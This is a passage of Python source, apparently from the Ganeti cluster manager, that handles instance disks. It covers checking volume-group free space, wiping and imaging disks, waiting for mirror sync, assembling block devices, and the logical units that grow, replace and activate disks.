inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
if self.cfg.GetClusterInfo().prealloc_wipe_disks:
wipedisks = [(idx, disk, 0)
for (idx, disk) in enumerate(inst_disks)
if idx not in to_skip]
WipeOrCleanupDisks(self, self.instance, disks=wipedisks,
cleanup=new_disks)
def _PerformNodeInfoCall(lu, node_uuids, vg):
"""Prepares the input and performs a node info call.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: list of string
@param node_uuids: list of node UUIDs to perform the call for
@type vg: string
@param vg: the volume group's name
"""
lvm_storage_units = [(constants.ST_LVM_VG, vg)]
storage_units = rpc.PrepareStorageUnitsForNodes(lu.cfg, lvm_storage_units,
node_uuids)
hvname = lu.cfg.GetHypervisorType()
hvparams = lu.cfg.GetClusterInfo().hvparams
nodeinfo = lu.rpc.call_node_info(node_uuids, storage_units,
[(hvname, hvparams[hvname])])
return nodeinfo
def _CheckVgCapacityForNode(node_name, node_info, vg, requested):
"""Checks the vg capacity for a given node.
  @type node_name: string
  @param node_name: the name of the node
  @type node_info: tuple (_, list of dicts, _)
  @param node_info: the result of the node info call for one node
@type vg: string
@param vg: volume group name
@type requested: int
@param requested: the amount of disk in MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
(_, space_info, _) = node_info
lvm_vg_info = utils.storage.LookupSpaceInfoByStorageType(
space_info, constants.ST_LVM_VG)
if not lvm_vg_info:
raise errors.OpPrereqError("Can't retrieve storage information for LVM",
errors.ECODE_ENVIRON)
vg_free = lvm_vg_info.get("storage_free", None)
if not isinstance(vg_free, int):
raise errors.OpPrereqError("Can't compute free disk space on node"
" %s for vg %s, result was '%s'" %
(node_name, vg, vg_free), errors.ECODE_ENVIRON)
if requested > vg_free:
raise errors.OpPrereqError("Not enough disk space on target node %s"
" vg %s: required %d MiB, available %d MiB" %
(node_name, vg, requested, vg_free),
errors.ECODE_NORES)
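# Minimal sketch of the node_info payload consumed above; the exact dict keys
# besides "storage_free" depend on LookupSpaceInfoByStorageType and are shown
# here only as an assumption:
#   node_info = (None,
#                [{"type": constants.ST_LVM_VG, "name": "xenvg",
#                  "storage_free": 8192, "storage_size": 102400}],
#                None)
#   _CheckVgCapacityForNode("node1", node_info, "xenvg", 4096)   # passes
#   _CheckVgCapacityForNode("node1", node_info, "xenvg", 16384)  # ECODE_NORES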
def _CheckNodesFreeDiskOnVG(lu, node_uuids, vg, requested):
"""Checks if nodes have enough free disk space in the specified VG.
This function checks if all given nodes have the needed amount of
free disk. In case any node has less disk or we cannot get the
information from the node, this function raises an OpPrereqError
exception.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: C{list}
@param node_uuids: the list of node UUIDs to check
@type vg: C{str}
@param vg: the volume group to check
@type requested: C{int}
@param requested: the amount of disk in MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
nodeinfo = _PerformNodeInfoCall(lu, node_uuids, vg)
for node_uuid in node_uuids:
node_name = lu.cfg.GetNodeName(node_uuid)
info = nodeinfo[node_uuid]
info.Raise("Cannot get current information from node %s" % node_name,
prereq=True, ecode=errors.ECODE_ENVIRON)
_CheckVgCapacityForNode(node_name, info.payload, vg, requested)
def CheckNodesFreeDiskPerVG(lu, node_uuids, req_sizes):
"""Checks if nodes have enough free disk space in all the VGs.
This function checks if all given nodes have the needed amount of
free disk. In case any node has less disk or we cannot get the
information from the node, this function raises an OpPrereqError
exception.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: C{list}
@param node_uuids: the list of node UUIDs to check
@type req_sizes: C{dict}
@param req_sizes: the hash of vg and corresponding amount of disk in
MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
for vg, req_size in req_sizes.items():
_CheckNodesFreeDiskOnVG(lu, node_uuids, vg, req_size)
def _DiskSizeInBytesToMebibytes(lu, size):
"""Converts a disk size in bytes to mebibytes.
Warns and rounds up if the size isn't an even multiple of 1 MiB.
"""
(mib, remainder) = divmod(size, 1024 * 1024)
if remainder != 0:
lu.LogWarning("Disk size is not an even multiple of 1 MiB; rounding up"
" to not overwrite existing data (%s bytes will not be"
" wiped)", (1024 * 1024) - remainder)
mib += 1
return mib
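# Worked example for the helper above: a disk reported as 5369233408 bytes
# (5 GiB + 512 KiB) yields divmod(size, 1024 * 1024) == (5120, 524288); the
# non-zero remainder triggers the warning and the result is rounded up to
# 5121 MiB, leaving 1048576 - 524288 = 524288 bytes below the next MiB
# boundary unwiped.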
def _CalcEta(time_taken, written, total_size):
"""Calculates the ETA based on size written and total size.
@param time_taken: The time taken so far
@param written: amount written so far
@param total_size: The total size of data to be written
@return: The remaining time in seconds
"""
avg_time = time_taken / float(written)
return (total_size - written) * avg_time
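# Worked example for _CalcEta: with 512 MiB written in 30 seconds out of a
# 2048 MiB total, avg_time is 30 / 512.0 and the estimate is
# (2048 - 512) * (30 / 512.0) = 90.0 seconds remaining.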
def WipeDisks(lu, instance, disks=None):
"""Wipes instance disks.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type disks: None or list of tuple of (number, L{objects.Disk}, number)
@param disks: Disk details; tuple contains disk index, disk object and the
start offset
"""
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
if disks is None:
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = [(idx, disk, 0)
for (idx, disk) in enumerate(inst_disks)]
logging.info("Pausing synchronization of disks of instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
True)
result.Raise("Failed to pause disk synchronization on node '%s'" % node_name)
for idx, success in enumerate(result.payload):
if not success:
logging.warn("Pausing synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
try:
for (idx, device, offset) in disks:
# The wipe size is MIN_WIPE_CHUNK_PERCENT % of the instance disk but
# MAX_WIPE_CHUNK at max. Truncating to integer to avoid rounding errors.
wipe_chunk_size = \
int(min(constants.MAX_WIPE_CHUNK,
device.size / 100.0 * constants.MIN_WIPE_CHUNK_PERCENT))
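      # Illustrative numbers, assuming MAX_WIPE_CHUNK = 1024 MiB and
      # MIN_WIPE_CHUNK_PERCENT = 10 (see constants for the actual values): a
      # 2048 MiB disk is wiped in int(2048 * 0.10) = 204 MiB chunks, while
      # disks above 10240 MiB are capped at 1024 MiB per blockdev_wipe call.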
size = device.size
last_output = 0
start_time = time.time()
if offset == 0:
info_text = ""
else:
info_text = (" (from %s to %s)" %
(utils.FormatUnit(offset, "h"),
utils.FormatUnit(size, "h")))
lu.LogInfo("* Wiping disk %s%s", idx, info_text)
logging.info("Wiping disk %d for instance %s on node %s using"
" chunk size %s", idx, instance.name, node_name,
wipe_chunk_size)
while offset < size:
wipe_size = min(wipe_chunk_size, size - offset)
logging.debug("Wiping disk %d, offset %s, chunk %s",
idx, offset, wipe_size)
result = lu.rpc.call_blockdev_wipe(node_uuid, (device, instance),
offset, wipe_size)
result.Raise("Could not wipe disk %d at offset %d for size %d" %
(idx, offset, wipe_size))
now = time.time()
offset += wipe_size
if now - last_output >= 60:
eta = _CalcEta(now - start_time, offset, size)
lu.LogInfo(" - done: %.1f%% ETA: %s",
offset / float(size) * 100, utils.FormatSeconds(eta))
last_output = now
finally:
logging.info("Resuming synchronization of disks for instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
False)
if result.fail_msg:
lu.LogWarning("Failed to resume disk synchronization on node '%s': %s",
node_name, result.fail_msg)
else:
for idx, success in enumerate(result.payload):
if not success:
lu.LogWarning("Resuming synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
def ImageDisks(lu, instance, image, disks=None):
"""Dumps an image onto an instance disk.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type image: string
@param image: the image whose disks we should create
@type disks: None or list of ints
@param disks: disk indices
"""
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
if disks is None:
disks = [(0, inst_disks[0])]
else:
disks = [(idx, inst_disks[idx]) for idx in disks]
logging.info("Pausing synchronization of disks of instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
True)
result.Raise("Failed to pause disk synchronization on node '%s'" % node_name)
for idx, success in enumerate(result.payload):
if not success:
logging.warn("Pausing synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
try:
for (idx, device) in disks:
lu.LogInfo("Imaging disk '%d' for instance '%s' on node '%s'",
idx, instance.name, node_name)
result = lu.rpc.call_blockdev_image(node_uuid, (device, instance),
image, device.size)
result.Raise("Could not image disk '%d' for instance '%s' on node '%s'" %
(idx, instance.name, node_name))
finally:
logging.info("Resuming synchronization of disks for instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
False)
if result.fail_msg:
lu.LogWarning("Failed to resume disk synchronization for instance '%s' on"
" node '%s'", node_name, result.fail_msg)
else:
for idx, success in enumerate(result.payload):
if not success:
lu.LogWarning("Failed to resume synchronization of disk '%d' of"
" instance '%s'", idx, instance.name)
def WipeOrCleanupDisks(lu, instance, disks=None, cleanup=None):
"""Wrapper for L{WipeDisks} that handles errors.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should wipe
@param disks: see L{WipeDisks}
@param cleanup: the result returned by L{CreateDisks}, used for cleanup in
case of error
@raise errors.OpPrereqError: in case of failure
"""
try:
WipeDisks(lu, instance, disks=disks)
except errors.OpExecError:
logging.warning("Wiping disks for instance '%s' failed",
instance.name)
_UndoCreateDisks(lu, cleanup, instance)
raise
def ExpandCheckDisks(instance_disks, disks):
"""Return the instance disks selected by the disks list
@type disks: list of L{objects.Disk} or None
@param disks: selected disks
@rtype: list of L{objects.Disk}
@return: selected instance disks to act on
"""
if disks is None:
return instance_disks
else:
inst_disks_uuids = [d.uuid for d in instance_disks]
disks_uuids = [d.uuid for d in disks]
if not set(disks_uuids).issubset(inst_disks_uuids):
raise errors.ProgrammerError("Can only act on disks belonging to the"
" target instance: expected a subset of %s,"
" got %s" % (inst_disks_uuids, disks_uuids))
return disks
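# Minimal usage sketch: callers either pass disks=None to act on every
# instance disk, or a subset of the objects returned by
# cfg.GetInstanceDisks(instance.uuid); anything outside that set is treated
# as a programming error:
#   ExpandCheckDisks(inst_disks, None)            # -> inst_disks
#   ExpandCheckDisks(inst_disks, inst_disks[:1])  # -> the selected subset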
def WaitForSync(lu, instance, disks=None, oneshot=False):
"""Sleep and poll for an instance's disk to sync.
"""
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
  if not inst_disks or (disks is not None and not disks):
return True
disks = [d for d in ExpandCheckDisks(inst_disks, disks)
if d.dev_type in constants.DTS_INT_MIRROR]
if not oneshot:
lu.LogInfo("Waiting for instance %s to sync disks", instance.name)
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
# TODO: Convert to utils.Retry
retries = 0
degr_retries = 10 # in seconds, as we sleep 1 second each time
while True:
max_time = 0
done = True
cumul_degraded = False
rstats = lu.rpc.call_blockdev_getmirrorstatus(node_uuid, (disks, instance))
msg = rstats.fail_msg
if msg:
lu.LogWarning("Can't get any data from node %s: %s", node_name, msg)
retries += 1
if retries >= 10:
raise errors.RemoteError("Can't contact node %s for mirror data,"
" aborting." % node_name)
time.sleep(6)
continue
rstats = rstats.payload
retries = 0
for i, mstat in enumerate(rstats):
if mstat is None:
lu.LogWarning("Can't compute data for node %s/%s",
node_name, disks[i].iv_name)
continue
cumul_degraded = (cumul_degraded or
(mstat.is_degraded and mstat.sync_percent is None))
if mstat.sync_percent is not None:
done = False
if mstat.estimated_time is not None:
rem_time = ("%s remaining (estimated)" %
utils.FormatSeconds(mstat.estimated_time))
max_time = mstat.estimated_time
else:
rem_time = "no time estimate"
max_time = 5 # sleep at least a bit between retries
lu.LogInfo("- device %s: %5.2f%% done, %s",
disks[i].iv_name, mstat.sync_percent, rem_time)
# if we're done but degraded, let's do a few small retries, to
# make sure we see a stable and not transient situation; therefore
# we force restart of the loop
if (done or oneshot) and cumul_degraded and degr_retries > 0:
logging.info("Degraded disks found, %d retries left", degr_retries)
degr_retries -= 1
time.sleep(1)
continue
if done or oneshot:
break
time.sleep(min(60, max_time))
if done:
lu.LogInfo("Instance %s's disks are in sync", instance.name)
return not cumul_degraded
def ShutdownInstanceDisks(lu, instance, disks=None, ignore_primary=False):
"""Shutdown block devices of an instance.
This does the shutdown on all nodes of the instance.
  If ignore_primary is true, errors on the primary node are ignored;
  otherwise they cause the function to return False.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
"""
all_result = True
if disks is None:
# only mark instance disks as inactive if all disks are affected
lu.cfg.MarkInstanceDisksInactive(instance.uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = ExpandCheckDisks(inst_disks, disks)
for disk in disks:
for node_uuid, top_disk in disk.ComputeNodeTree(instance.primary_node):
result = lu.rpc.call_blockdev_shutdown(node_uuid, (top_disk, instance))
msg = result.fail_msg
if msg:
lu.LogWarning("Could not shutdown block device %s on node %s: %s",
disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
if ((node_uuid == instance.primary_node and not ignore_primary) or
(node_uuid != instance.primary_node and not result.offline)):
all_result = False
return all_result
def _SafeShutdownInstanceDisks(lu, instance, disks=None, req_states=None):
"""Shutdown block devices of an instance.
This function checks if an instance is running, before calling
  ShutdownInstanceDisks.
"""
if req_states is None:
req_states = INSTANCE_DOWN
CheckInstanceState(lu, instance, req_states, msg="cannot shutdown disks")
ShutdownInstanceDisks(lu, instance, disks=disks)
def AssembleInstanceDisks(lu, instance, disks=None, ignore_secondaries=False,
ignore_size=False):
"""Prepare the block devices for an instance.
This sets up the block devices on all nodes.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance for whose disks we assemble
@type disks: list of L{objects.Disk} or None
@param disks: which disks to assemble (or all, if None)
@type ignore_secondaries: boolean
@param ignore_secondaries: if true, errors on secondary nodes
won't result in an error return from the function
@type ignore_size: boolean
@param ignore_size: if true, the current known size of the disk
will not be used during the disk activation, useful for cases
when the size is wrong
@return: False if the operation failed, otherwise a list of
(host, instance_visible_name, node_visible_name)
with the mapping from node devices to instance devices, as well as the
payloads of the RPC calls
"""
device_info = []
disks_ok = True
payloads = []
if disks is None:
# only mark instance disks as active if all disks are affected
instance = lu.cfg.MarkInstanceDisksActive(instance.uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = ExpandCheckDisks(inst_disks, disks)
# With the two passes mechanism we try to reduce the window of
# opportunity for the race condition of switching DRBD to primary
  # before handshaking occurred, but we do not eliminate it
# The proper fix would be to wait (with some limits) until the
# connection has been made and drbd transitions from WFConnection
# into any other network-connected state (Connected, SyncTarget,
# SyncSource, etc.)
# 1st pass, assemble on all nodes in secondary mode
for idx, inst_disk in enumerate(disks):
for node_uuid, node_disk in inst_disk.ComputeNodeTree(
instance.primary_node):
if ignore_size:
node_disk = node_disk.Copy()
node_disk.UnsetSize()
result = lu.rpc.call_blockdev_assemble(node_uuid, (node_disk, instance),
instance, False, idx)
msg = result.fail_msg
if msg:
secondary_nodes = lu.cfg.GetInstanceSecondaryNodes(instance.uuid)
is_offline_secondary = (node_uuid in secondary_nodes and
result.offline)
lu.LogWarning("Could not prepare block device %s on node %s"
" (is_primary=False, pass=1): %s",
inst_disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
if not (ignore_secondaries or is_offline_secondary):
disks_ok = False
# FIXME: race condition on drbd migration to primary
# 2nd pass, do only the primary node
for idx, inst_disk in enumerate(disks):
dev_path = None
for node_uuid, node_disk in inst_disk.ComputeNodeTree(
instance.primary_node):
if node_uuid != instance.primary_node:
continue
if ignore_size:
node_disk = node_disk.Copy()
node_disk.UnsetSize()
result = lu.rpc.call_blockdev_assemble(node_uuid, (node_disk, instance),
instance, True, idx)
payloads.append(result.payload)
msg = result.fail_msg
if msg:
lu.LogWarning("Could not prepare block device %s on node %s"
" (is_primary=True, pass=2): %s",
inst_disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
disks_ok = False
else:
dev_path, _, __ = result.payload
device_info.append((lu.cfg.GetNodeName(instance.primary_node),
inst_disk.iv_name, dev_path))
if not disks_ok:
lu.cfg.MarkInstanceDisksInactive(instance.uuid)
return disks_ok, device_info, payloads
def StartInstanceDisks(lu, instance, force):
"""Start the disks of an instance.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
"""
disks_ok, _, _ = AssembleInstanceDisks(lu, instance,
ignore_secondaries=force)
if not disks_ok:
ShutdownInstanceDisks(lu, instance)
if force is not None and not force:
lu.LogWarning("",
hint=("If the message above refers to a secondary node,"
" you can retry the operation using '--force'"))
raise errors.OpExecError("Disk consistency error")
class LUInstanceGrowDisk(LogicalUnit):
"""Grow a disk of an instance.
"""
HPATH = "disk-grow"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
elif level == locking.LEVEL_NODE_RES:
# Copy node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
CopyLockList(self.needed_locks[locking.LEVEL_NODE])
def BuildHooksEnv(self):
"""Build hooks env.
This runs on the master, the primary and all the secondaries.
"""
env = {
"DISK": self.op.disk,
"AMOUNT": self.op.amount,
"ABSOLUTE": self.op.absolute,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + \
list(self.cfg.GetInstanceNodes(self.instance.uuid))
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
node_uuids = list(self.cfg.GetInstanceNodes(self.instance.uuid))
for node_uuid in node_uuids:
CheckNodeOnline(self, node_uuid)
self.node_es_flags = rpc.GetExclusiveStorageForNodes(self.cfg, node_uuids)
self.disk = self.cfg.GetDiskInfo(self.instance.FindDisk(self.op.disk))
if self.disk.dev_type not in constants.DTS_GROWABLE:
raise errors.OpPrereqError(
"Instance's disk layout %s does not support"
" growing" % self.disk.dev_type, errors.ECODE_INVAL)
if self.op.absolute:
self.target = self.op.amount
self.delta = self.target - self.disk.size
if self.delta < 0:
raise errors.OpPrereqError("Requested size (%s) is smaller than "
"current disk size (%s)" %
(utils.FormatUnit(self.target, "h"),
utils.FormatUnit(self.disk.size, "h")),
errors.ECODE_STATE)
else:
self.delta = self.op.amount
self.target = self.disk.size + self.delta
if self.delta < 0:
raise errors.OpPrereqError("Requested increment (%s) is negative" %
utils.FormatUnit(self.delta, "h"),
errors.ECODE_INVAL)
self._CheckDiskSpace(node_uuids, self.disk.ComputeGrowth(self.delta))
self._CheckIPolicy(self.target)
def _CheckDiskSpace(self, node_uuids, req_vgspace):
template = self.disk.dev_type
if (template not in constants.DTS_NO_FREE_SPACE_CHECK and
not any(self.node_es_flags.values())):
# TODO: check the free disk space for file, when that feature will be
# supported
# With exclusive storage we need to do something smarter than just looking
# at free space, which, in the end, is basically a dry run. So we rely on
# the dry run performed in Exec() instead.
CheckNodesFreeDiskPerVG(self, node_uuids, req_vgspace)
def _CheckIPolicy(self, target_size):
cluster = self.cfg.GetClusterInfo()
group_uuid = list(self.cfg.GetInstanceNodeGroups(self.op.instance_uuid,
primary_only=True))[0]
group_info = self.cfg.GetNodeGroup(group_uuid)
ipolicy = ganeti.masterd.instance.CalculateGroupIPolicy(cluster,
group_info)
disks = self.cfg.GetInstanceDisks(self.op.instance_uuid)
disk_sizes = [disk.size if disk.uuid != self.disk.uuid else target_size
for disk in disks]
# The ipolicy checker below ignores None, so we only give it the disk size
res = ComputeIPolicyDiskSizesViolation(ipolicy, disk_sizes, disks)
if res:
msg = ("Growing disk %s violates policy: %s" %
(self.op.disk,
utils.CommaJoin(res)))
if self.op.ignore_ipolicy:
self.LogWarning(msg)
else:
raise errors.OpPrereqError(msg, errors.ECODE_INVAL)
def Exec(self, feedback_fn):
"""Execute disk grow.
"""
assert set([self.instance.name]) == self.owned_locks(locking.LEVEL_INSTANCE)
assert (self.owned_locks(locking.LEVEL_NODE) ==
self.owned_locks(locking.LEVEL_NODE_RES))
wipe_disks = self.cfg.GetClusterInfo().prealloc_wipe_disks
disks_ok, _, _ = AssembleInstanceDisks(self, self.instance,
disks=[self.disk])
if not disks_ok:
raise errors.OpExecError("Cannot activate block device to grow")
feedback_fn("Growing disk %s of instance '%s' by %s to %s" %
(self.op.disk, self.instance.name,
utils.FormatUnit(self.delta, "h"),
utils.FormatUnit(self.target, "h")))
# First run all grow ops in dry-run mode
inst_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)
for node_uuid in inst_nodes:
result = self.rpc.call_blockdev_grow(node_uuid,
(self.disk, self.instance),
self.delta, True, True,
self.node_es_flags[node_uuid])
result.Raise("Dry-run grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
if wipe_disks:
# Get disk size from primary node for wiping
result = self.rpc.call_blockdev_getdimensions(
self.instance.primary_node, [([self.disk], self.instance)])
result.Raise("Failed to retrieve disk size from node '%s'" %
self.instance.primary_node)
(disk_dimensions, ) = result.payload
if disk_dimensions is None:
raise errors.OpExecError("Failed to retrieve disk size from primary"
" node '%s'" % self.instance.primary_node)
(disk_size_in_bytes, _) = disk_dimensions
old_disk_size = _DiskSizeInBytesToMebibytes(self, disk_size_in_bytes)
assert old_disk_size >= self.disk.size, \
("Retrieved disk size too small (got %s, should be at least %s)" %
(old_disk_size, self.disk.size))
else:
old_disk_size = None
    # We know that (as far as we can test) operations across different
    # nodes will succeed, so now we run the grow for real on the backing
    # storage
for node_uuid in inst_nodes:
result = self.rpc.call_blockdev_grow(node_uuid,
(self.disk, self.instance),
self.delta, False, True,
self.node_es_flags[node_uuid])
result.Raise("Grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
# And now execute it for logical storage, on the primary node
node_uuid = self.instance.primary_node
result = self.rpc.call_blockdev_grow(node_uuid, (self.disk, self.instance),
self.delta, False, False,
self.node_es_flags[node_uuid])
result.Raise("Grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
self.disk.RecordGrow(self.delta)
self.cfg.Update(self.instance, feedback_fn)
self.cfg.Update(self.disk, feedback_fn)
# Changes have been recorded, release node lock
ReleaseLocks(self, locking.LEVEL_NODE)
# Downgrade lock while waiting for sync
self.WConfdClient().DownGradeLocksLevel(
locking.LEVEL_NAMES[locking.LEVEL_INSTANCE])
assert wipe_disks ^ (old_disk_size is None)
if wipe_disks:
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
assert inst_disks[self.op.disk] == self.disk
# Wipe newly added disk space
WipeDisks(self, self.instance,
disks=[(self.op.disk, self.disk, old_disk_size)])
if self.op.wait_for_sync:
disk_abort = not WaitForSync(self, self.instance, disks=[self.disk])
if disk_abort:
self.LogWarning("Disk syncing has not returned a good status; check"
" the instance")
if not self.instance.disks_active:
_SafeShutdownInstanceDisks(self, self.instance, disks=[self.disk])
elif not self.instance.disks_active:
self.LogWarning("Not shutting down the disk even if the instance is"
" not supposed to be running because no wait for"
" sync mode was requested")
assert self.owned_locks(locking.LEVEL_NODE_RES)
assert set([self.instance.name]) == self.owned_locks(locking.LEVEL_INSTANCE)
class LUInstanceReplaceDisks(LogicalUnit):
"""Replace the disks of an instance.
"""
HPATH = "mirrors-replace"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
"""Check arguments.
"""
if self.op.mode == constants.REPLACE_DISK_CHG:
if self.op.remote_node is None and self.op.iallocator is None:
raise errors.OpPrereqError("When changing the secondary either an"
" iallocator script must be used or the"
" new node given", errors.ECODE_INVAL)
else:
CheckIAllocatorOrNode(self, "iallocator", "remote_node")
elif self.op.remote_node is not None or self.op.iallocator is not None:
# Not replacing the secondary
raise errors.OpPrereqError("The iallocator and new node options can"
" only be used when changing the"
" secondary node", errors.ECODE_INVAL)
def ExpandNames(self):
self._ExpandAndLockInstance(allow_forthcoming=True)
assert locking.LEVEL_NODE not in self.needed_locks
assert locking.LEVEL_NODE_RES not in self.needed_locks
assert locking.LEVEL_NODEGROUP not in self.needed_locks
assert self.op.iallocator is None or self.op.remote_node is None, \
"Conflicting options"
if self.op.remote_node is not None:
(self.op.remote_node_uuid, self.op.remote_node) = \
ExpandNodeUuidAndName(self.cfg, self.op.remote_node_uuid,
self.op.remote_node)
# Warning: do not remove the locking of the new secondary here
# unless DRBD8Dev.AddChildren is changed to work in parallel;
# currently it doesn't since parallel invocations of
# FindUnusedMinor will conflict
self.needed_locks[locking.LEVEL_NODE] = [self.op.remote_node_uuid]
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_APPEND
else:
self.needed_locks[locking.LEVEL_NODE] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
if self.op.iallocator is not None:
# iallocator will select a new node in the same group
self.needed_locks[locking.LEVEL_NODEGROUP] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
self.dont_collate_locks[locking.LEVEL_NODEGROUP] = True
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
self.replacer = TLReplaceDisks(self, self.op.instance_uuid,
self.op.instance_name, self.op.mode,
self.op.iallocator, self.op.remote_node_uuid,
self.op.disks, self.op.early_release,
self.op.ignore_ipolicy)
self.tasklets = [self.replacer]
def DeclareLocks(self, level):
if level == locking.LEVEL_NODEGROUP:
assert self.op.remote_node_uuid is None
assert self.op.iallocator is not None
assert not self.needed_locks[locking.LEVEL_NODEGROUP]
self.share_locks[locking.LEVEL_NODEGROUP] = 1
# Lock all groups used by instance optimistically; this requires going
# via the node before it's locked, requiring verification later on
self.needed_locks[locking.LEVEL_NODEGROUP] = \
self.cfg.GetInstanceNodeGroups(self.op.instance_uuid)
elif level == locking.LEVEL_NODE:
if self.op.iallocator is not None:
assert self.op.remote_node_uuid is None
assert not self.needed_locks[locking.LEVEL_NODE]
# Lock member nodes of all locked groups
self.needed_locks[locking.LEVEL_NODE] = \
[node_uuid
for group_uuid in self.owned_locks(locking.LEVEL_NODEGROUP)
for node_uuid in self.cfg.GetNodeGroup(group_uuid).members]
else:
self._LockInstancesNodes()
elif level == locking.LEVEL_NODE_RES:
# Reuse node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
self.needed_locks[locking.LEVEL_NODE]
def BuildHooksEnv(self):
"""Build hooks env.
This runs on the master, the primary and all the secondaries.
"""
instance = self.replacer.instance
secondary_nodes = self.cfg.GetInstanceSecondaryNodes(instance.uuid)
env = {
"MODE": self.op.mode,
"NEW_SECONDARY": self.op.remote_node,
"OLD_SECONDARY": self.cfg.GetNodeName(secondary_nodes[0]),
}
env.update(BuildInstanceHookEnvByObject(self, instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
instance = self.replacer.instance
nl = [
self.cfg.GetMasterNode(),
instance.primary_node,
]
if self.op.remote_node_uuid is not None:
nl.append(self.op.remote_node_uuid)
return nl, nl
def CheckPrereq(self):
"""Check prerequisites.
"""
# Verify if node group locks are still correct
owned_groups = self.owned_locks(locking.LEVEL_NODEGROUP)
if owned_groups:
CheckInstanceNodeGroups(self.cfg, self.op.instance_uuid, owned_groups)
return LogicalUnit.CheckPrereq(self)
class LUInstanceActivateDisks(NoHooksLU):
"""Bring up an instance's disks.
"""
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Activate the disks.
"""
disks_ok, disks_info, _ = AssembleInstanceDisks(
self, self.instance, ignore_size=self.op.ignore_size)
if not disks_ok:
raise errors.OpExecError("Cannot activate block devices")
if self.op.wait_for_sync:
if not WaitForSync(self, self.instance):
self.cfg.MarkInstanceDisksInactive(self.instance.uuid)
raise errors.OpExecError("Some disks of the instance are degraded!")
return disks_info
class LUInstanceDeactivateDisks(NoHooksLU):
"""Shutdown an instance's disks.
"""
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
